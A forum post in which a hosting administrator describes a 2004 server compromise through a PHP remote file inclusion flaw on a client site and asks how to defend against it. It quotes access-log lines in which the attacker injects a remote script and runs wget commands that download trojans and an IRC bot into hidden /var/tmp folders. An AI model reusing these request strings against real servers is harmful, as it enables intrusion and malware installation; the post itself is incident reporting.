bad coding - uploading trojan
My server has been down all day because of some bad coding of one of the sites im hosting. We (actualy a friend) discovered some weird programs (ex. a program called "dor" - irc file server) in /var/tmp, it generated so much traffic at the nameserver port that is killed all sites. It recreated itself when we tried to delete it.
We found out it was caused by bad programming at one of the sites im hosting. They didnt validate the values of the valiables - the trojans got into my server my using this:
202.159.43.33 - - [17/Oct/2004:04:41:52 -0500] "GET /index.php?page=http://senyum.net/cmd.do%3f&cmd=cd%20/var/tmp/.tmp;wget%20pemula.port5.com/mumet.tar.gz HTTP/1.1" 200 15797 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.23 [en]"
202.159.43.33 - - [17/Oct/2004:04:43:45 -0500] "GET /index.php?page=http://senyum.net/cmd.do%3f&cmd=cd%20/var/tmp/.tmp/.xfs/.inoe/scripts;wget%20freewebs.com/hikaro82/hikaro.tcl HTTP/1.1" 200 15315 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.23 [en]"
202.159.43.33 - - [17/Oct/2004:04:44:14 -0500] "GET /index.php?page=http://senyum.net/cmd.do%3f&cmd=cd%20/var/tmp/.tmp/.xfs/.inoe;wget%20http://www.geocities.com/altbot//hikare.txt HTTP/1.1" 200 14918 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.23 [en]"
202.159.43.33 - - [17/Oct/2004:05:20:03 -0500] "GET /index.php?page=http://senyum.net/cmd.do%3f&cmd=cd%20/var/tmp;wget%20pemula.port5.com/dor HTTP/1.1" 200 14891 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.23 [en]"
202.159.43.33 - - [17/Oct/2004:12:44:50 -0500] "GET /index.php?page=http://senyum.net/cmd.do%3f&cmd=cd%20/var/tmp/.tmp;wget%20pemula.port5.com/dor HTTP/1.1" 200 14891 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.23 [en]"
202.159.43.33 - - [17/Oct/2004:13:54:41 -0500] "GET /index.php?page=http://senyum.net/cmd.do%3f&cmd=cd%20/var/tmp;wget%20pemula.port5.com/dor HTTP/1.1" 200 14890 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.23 [en]"
- It is impossible to do anything against bad coding from clients, so is there anyway to protect against something like this in the future?
